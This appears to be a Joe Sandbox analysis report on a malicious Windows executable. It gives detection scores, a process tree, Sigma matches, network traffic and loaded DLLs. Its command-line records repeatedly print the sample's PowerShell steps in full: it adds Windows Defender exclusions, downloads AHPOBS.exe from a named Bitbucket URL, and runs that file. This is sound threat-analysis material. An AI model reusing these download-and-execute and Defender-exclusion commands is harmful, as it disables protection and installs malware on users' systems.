Edit tour

Windows Analysis Report
Gq48hjKhZf.exe

Overview

General Information

Sample name:	Gq48hjKhZf.exe renamed because original name is a hash value
Original sample name:	454bf064c19d363b154a419fc69dc693.exe
Analysis ID:	1580296
MD5:	454bf064c19d363b154a419fc69dc693
SHA1:	98beb972b52d32c846e9e485cbf17e9211cbe5ab
SHA256:	6a46b3762d71b47d0c728e967ee9129f523689ff70196a953baa3f60c85a26b5
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Powershell download and execute

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Gq48hjKhZf.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\Gq48hjKhZf.exe" MD5: 454BF064C19D363B154A419FC69DC693)

cmd.exe (PID: 7624 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7676 cmdline: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7872 cmdline: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')"; MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7984 cmdline: powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8108 cmdline: cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe; MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: Gq48hjKhZf.exe PID: 7572	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi64_7872.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 7676, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 7676, ProcessName: powershell.exe

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, ProcessId: 7872, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, ProcessId: 7872, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, ProcessId: 7872, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 7676, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Gq48hjKhZf.exe	Virustotal: Detection: 55%			Perma Link
Source: Gq48hjKhZf.exe	ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Gq48hjKhZf.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	File opened: C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	File opened: C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	File opened: C:\Users\user\AppData\Local\Temp\9A83.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	File opened: C:\Users\user\	Jump to behavior

Source: global traffic

HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/AHPOBS.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 185.166.143.48 185.166.143.48

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/AHPOBS.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: bitbucket.org

Source: Gq48hjKhZf.exe, 00000000.00000003.1780751505.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, 9A85.bat.0.dr

String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Code function: 0_2_00000001400138E5	0_2_00000001400138E5
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Code function: 0_2_00000001400154F0	0_2_00000001400154F0
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Code function: 0_2_0000000140015160	0_2_0000000140015160
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Code function: 0_2_0000000140015170	0_2_0000000140015170
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Code function: 0_2_0000000140013175	0_2_0000000140013175
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Code function: 0_2_0000000140010210	0_2_0000000140010210
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Code function: 0_2_0000000140016210	0_2_0000000140016210
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Code function: 0_2_000000014000EA48	0_2_000000014000EA48
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Code function: 0_2_000000014001366E	0_2_000000014001366E
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Code function: 0_2_000000014000B758	0_2_000000014000B758
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Code function: 0_2_0000000140012FDD	0_2_0000000140012FDD

Source: classification engine

Classification label: mal88.evad.winEXE@12/12@1/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe

File created: C:\Users\user\AppData\Local\Temp\9A83.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Gq48hjKhZf.exe	Virustotal: Detection: 55%
Source: Gq48hjKhZf.exe	ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\Gq48hjKhZf.exe "C:\Users\user\Desktop\Gq48hjKhZf.exe"
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;	Jump to behavior

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
